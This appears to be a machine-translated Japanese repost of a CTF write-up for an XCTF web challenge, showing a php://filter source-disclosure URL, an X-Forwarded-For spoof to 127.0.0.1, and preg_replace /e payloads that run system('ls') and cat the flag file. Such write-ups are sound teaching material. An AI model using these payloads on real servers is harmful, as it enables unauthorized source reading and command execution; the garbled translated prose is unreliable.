[CTF]ファイル(PHP擬似プロトコル)+コードが実行される(XCTF 4日-CyberEarth)を含有

著者:管理者

[原理]
読み取るためのソースコードを含むファイル、X-転送-FOR

preg_replace正規表現検索を実行し、交換すると、preg_replce正規表現のセクションでは、パラメータEが含まれている、部品交換を行うことができます。

【目的】
正規表現を習得し、擬似プロトコルは、ソースコードを読み取ります

[環境]
Windowsの

[ツール]
Firefoxの、げっぷ

[手順]
1.機器保守センタクラウドインターネットページ、擬似プロトコルのPHPを使用してソースコードを読み取ります。

http://111.198.29.45:44740/index.php?page=php://filter/convert.base64-encode/resource=index.php

図2に示すように、ソースコード取得base64で復号処理、取得したソースindex.phpを、ライン121は、バックドアに見出すことができます。

3.コード監査のこのセクションはX_FORWARDED_FOR 127.0.0.1であることを必要として見つけることができる、とにpreg_replaceに渡された3つのパラメータによって転送されます。

ここにpreg_replace機能について、次のとおりです。

PHPは、正規表現で実際に試合は私が定期的に個別にブログを書くために必要な場所です。続く....それを待ちます

URLに、X_FORWARDED_FORを添加4.げっぷHTTPリクエストヘッダパラメータ変更、

示されているよう/index.php?pat=/(.*)/e&rep=system('ls')&sub=aaは、ファイルのリストを表示することができます。

5. /index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir')&sub=aaビューs3chahahaDirフォルダへのURLは、フォルダフラグを見つけます。

/index.php?pat=/(.*)/e&rep=system('ls+s3chahahaDir/flag')&sub=aa 6. urlはflag.phpファイルを見つけ、フラグフォルダを表示します。

図7に示すように/index.php?pat=/(.*)/e&rep=system('cat+s3chahahaDir/flag/flag.php')&sub=aaビューフラグへのURL、。

おすすめ

転載: www.cnblogs.com/-mo-/p/11572416.html